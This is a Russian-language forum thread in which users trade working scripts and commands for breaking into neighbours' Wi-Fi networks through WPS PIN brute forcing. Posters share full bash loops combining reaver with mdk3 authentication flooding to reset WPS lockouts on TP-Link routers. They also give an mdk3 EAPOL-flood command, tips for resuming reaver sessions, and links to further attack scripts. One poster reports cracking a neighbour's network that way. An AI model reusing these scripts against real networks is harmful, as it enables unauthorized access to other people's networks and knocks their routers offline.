а канал точка менять может может лучше без канала?я вообще нигде канал не ставлю,что бы автоматом находил,а то точки меняют каналы
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3. Вот его код: Code: #!/bin/sh while true; # Run reaver to work 50s do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v; sleep 4; # Run mdk3 to work 10s echo [+] Mdk3 is working ... timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null; echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ; sleep 24; done; У меня он не заработал и я его переделал: Code: #!/bin/bash while true; # Run reaver to work 10 pin echo echo echo [+] reaver is working ... do reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc; # Run mdk3 to work 3s echo echo echo [+] Mdk3 is working ... gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX"; sleep 3; killall mdk3 2> /dev/null; echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]; sleep 14; done; и меньше чем за сутки взломал эту сеть! sleep 3 - это сколько секунд шарашит mdk3 sleep 14 - пауза до появления точки в эфире -g 10 - сколько пинов перебирать Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c. Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов. https://forum.antichat.ru/threads/310835/page-193#post-4037706
что то слишком красиво и легко ,у меня этот mdk3 никаких проблем никакой точке не доставляет Это конкретно к тплинкам?а как скрипт на другие точки действует,типа асусов,пробовал? Прям так точка и здавалась легко на mdk3?значит точка такая,повезло а функция конкретно в скрипте mdk3 какая,навешивание ложных клиентов или деаут клиентов,или какая другая функция?
Проверял на точках которые мне доступны - кроме TP-Link ни одна не повелась. И из TP-Link ведется %25-30. Но Это лучше чем ничего!!!
а не мало ли mdk3 работает?3 сек всего что это за точки,которые от 3 сек падать будут ,я вон миллионы клиентов цеплял,точкам пофиг,тоже тп линк Говорю ж....красиво всё как то ну или там у тебя такие точки попадаются слабые
Все работает как надо, тп линк 740 от скрипта сдулся. Более мощные точки, типа 1043 на левых клиентов ложили свои большие черные.... антенны
вот и я ж говорю то какие точки просто,видимо слабые сдуваются только,а мощным,хоть миллиард клиентов вешай Я ж прочитал скрипт и удивился,что mdk3 3 сек только работает,сколько он клиентов на точку повесит ,mdk3 нужно на пол часа оставлять,может и будет эффект
незнаю,что у вас там за точки вокруг слабые,я сейчас скрипт опробывал,в mdk3 время на минуту поставил,и ничего..... та я на ночь mdk3 ставил,до десятка миллиона клиентов цеплял на точку(точки)и пофиг точкам У вас там просто такие точки,старые наверное,которые от 3 сек mdk3 сдуваются
подскажите , что делать. нашел пароль (Inflator v 1.0 в нем - Reaver 1.4-r119) - по привычке нажал Ctrl-C, думал скопировать , окно естественно закрылось, но при повторном запуске (в нифляторе тут же нажал Run с теми же параметрами без перезапуска последнего) процесс продолжился с 91% и потом пошли пляски 99.99% один и один тот же пин перебирает и ошибки 25 successive start failures. Почему сессия так криво сохранилась ? Тут кто-то команду вроде выкладывал, что якобы должно показать сразу найденный ключ при повторном запуске, не могу найти... p.s. добавил --pin xxxxxxxx, теперь опять пошло с 90% и проценты растут, но пин все тот же каждый раз вбивает (wps transaction failed, re-trying last pin), посмотрим, что будет...
Вот засада! Прийдется всё заново пересчитывать! А если серьезно, то -p хххх. Вбивай первые ЧЕТЫРЕ цифры подобранного пина, а вторую часть прийдется пересчитать. Это займет не так уж много времени. Такие глюки иногда встречаются. Первая часть уже подобрана верно.
ну что,у кого ещё скрипт работает?(ривер и мдк3)?у меня то скрипт пашет,а толку увеличил уже в скрипте продолжительность работы мдк3,точкам всё равно,хоть миллиард клиентов вешай Незнаю.....видимо мдк3 действует на какие то древние точки,новым пофиг эти все атаки...
что то уже тема мёртвая ,видимо потому,что уже wps не актуален,уже у людей новые точки,где wps лочится навсегда,и никакой mdk3 не берёт,и ничего нового придумать не могут,что бы эти локи обойти..... Вот тема и не развивается....
Друзья, есть новая уязвимость WPS у некоторых вендоров, она основана на низкой энтропии при генерации WPS кода на некоторых чипах BroadComm. (Грубо говоря, при каждой перезагрузке точки она генерирует один и тот же пин с большой вероятностью.) На августовской Black Hat 2014 конференции был продемонстрирован подбор WPS кода с 1-10 попыток на точках 2, пока мне неизвестных вендоров. Вот презентация частично описывающия уязвимость: http://www.engadget.com/2014/08/31/wifi-protected-setup-flaw/ У когото есть еще инфа?
а вот такое смотрели?http://www.youtube.com/watch?v=hHVPSJn4Fqo Какой то новый способ,вроде как mdk3,но другой какой то...
В примере показана EAPOL FLOOD ATTACK на точку доступа, парень включил ее с нескольких режимов monitor mode (mon1, mon2...) Сама атака: mdk3 mon0 x 0 -t ff:ff:ff:ff:ff:ff -n "Essid AP" - s 50000 -t - указываем BSSID Точки доступа -n - указываем Названи Точки доступа (ESSID) -s - указываем колличество EAPOL пакетов в секунду (в примере их 50000) В конце видео показано, что точка перезагружается и wps lock снимается.
вообще можно юзать ReVdK3-r1.sh Видео https://www.youtube.com/watch?v=zf93xJ7xD2k#t=74 Скачать http://www32.zippyshare.com/v/12811261/file.html Почитать https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode Есть ещё FrankenScript 2 , Atrophy
Смысл в том, что роутер должен не справиться с наплывом желающих присосаться и отправиться в ребут. Тема та же, что и с навешиванием левых клиентов на точку, только работает иначе. На кали линукс заработало, но как бы без разницы, на чем его запускать, срабатывает он крайне редко.
Что то подсказывает,что современным роутерам,с новыми прошивками,такая атака тоже до одного места,как и mdk3 классический ,не будут они ребутится.... Та да....скрипт то включается.работает.только толку 0,ну или только если натравливать на старые роутеры,а так просто работает скрипт и всё,хоть на сутки включай работу mdk3
